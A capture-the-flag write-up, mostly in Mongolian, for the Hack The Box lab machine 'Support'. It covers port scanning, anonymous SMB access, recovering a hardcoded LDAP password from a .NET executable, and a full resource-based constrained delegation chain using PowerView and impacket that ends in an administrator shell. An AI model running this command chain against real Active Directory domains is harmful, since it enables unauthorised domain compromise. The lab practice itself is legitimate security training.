🤕Support

Kerberos Exploit, LDAP enumeration, Windows Fuzzing

Би ерөнхийдөө хурдан мэдээлэл олж авах зорилгоор rustscan ашиглаж скандах дуртай

GitHub - bee-san/RustScan: 🤖 The Modern Port Scanner 🤖GitHub

rustscan -a support.htb --ulimit 5000 -b 2000

Open 10.10.11.174:53
Open 10.10.11.174:88
Open 10.10.11.174:135
Open 10.10.11.174:139
Open 10.10.11.174:389
Open 10.10.11.174:445
Open 10.10.11.174:464
Open 10.10.11.174:593
Open 10.10.11.174:636
Open 10.10.11.174:3269
Open 10.10.11.174:3268
Open 10.10.11.174:5985
Open 10.10.11.174:9389
Open 10.10.11.174:49664
Open 10.10.11.174:49668
Open 10.10.11.174:49670
Open 10.10.11.174:49675
Open 10.10.11.174:49699
Open 10.10.11.174:52273

445 буюу SMB онгорхой байсан учраас smbclient-г ашиглаж share дотор байгаа хэрэглэгчдийн мэдээллийг олж авсан

smbclient -L support.htb -N

Enumeration хийхэд олдсон support-tools хавтасыг нэмэлтээр оруулж дахин хандалт хийж үзнэ

smbclient //support.htb/support-tools -N

Ерөнхийдөө бүх файлыг нь mget * гэх мэтээр татаж үзсэн бөгөөд UserInfo.exe.zip дотор нууц мэдээллүүд байсан

Zip файлыг задлаад үзвэл дотор нь UserInfo.exe буюу Executable шууд ажиллуулах боломжтой файл байв

Энэхүү .exe файлаа задлаад үзвэл дотор нь Protected , LDAPQuery хэсэгт getPassword, enc_password, key гэсэн сэжигтэй 3 хэсэг харагдав

enc_password хэсгийг харвал дотор нь ямар шифрлэлт нь мэдэгдэхгүй сонин тэмдэгтүүд агуулсан нууц үг байв

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

key хэсгийг харвал шифрлэлтийн түлхүүр байх бөгөөд armando гэдэг string төрөлтэй байв

Түлхүүр нь "armando"

Онлайнаар тайлах гэж нилээн үзсэн боловч амжилтыг эс олсон учраас эхлээд base64-оор тайлаад нэг бүрчлэн массивт хувааж байгаад join хийж үзэв

Ямар ч байсан human-readable текст гарч ирсэн бөгөөд энэхүү үр дүнг ашиглаад LDAP enumeration хийх боломжтой

Domain дотроосоо LDAPsearch хийгээд username-д харгалзах нууц үгийг олох боломжтой Ironside47pleasure40Watchful

Ironside47pleasure40Watchful

LDAP-аас хэрэглэгчдийн нэрийг түүж аваад user.txt файл болгоод бидний олсон нууц үгтэй зөв харгалзах нэрийг олно

username: support

finally got user.txt

PowerSploit/Recon/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

New-MachineAccount -MachineAccount fg0x0 -Password $(ConvertTo-SecureString 'fg0x0' -AsPlainText -Force) -Verbose

Get-DomainComputer fg0x0

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

impacket ашиглаад kerberos ticket үүсгэх боломжтой харин үүсгэхдээ domain-г /etc/hosts дотроо нэмж өгөхөө мартваа

impacket-getST support.htb/fg0x0:fg0x0 -dc-ip support.htb -impersonate administrator -spn www/dc.support.htb

export KRB5CCNAME=administrator.ccache

impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

Finally you got root privilege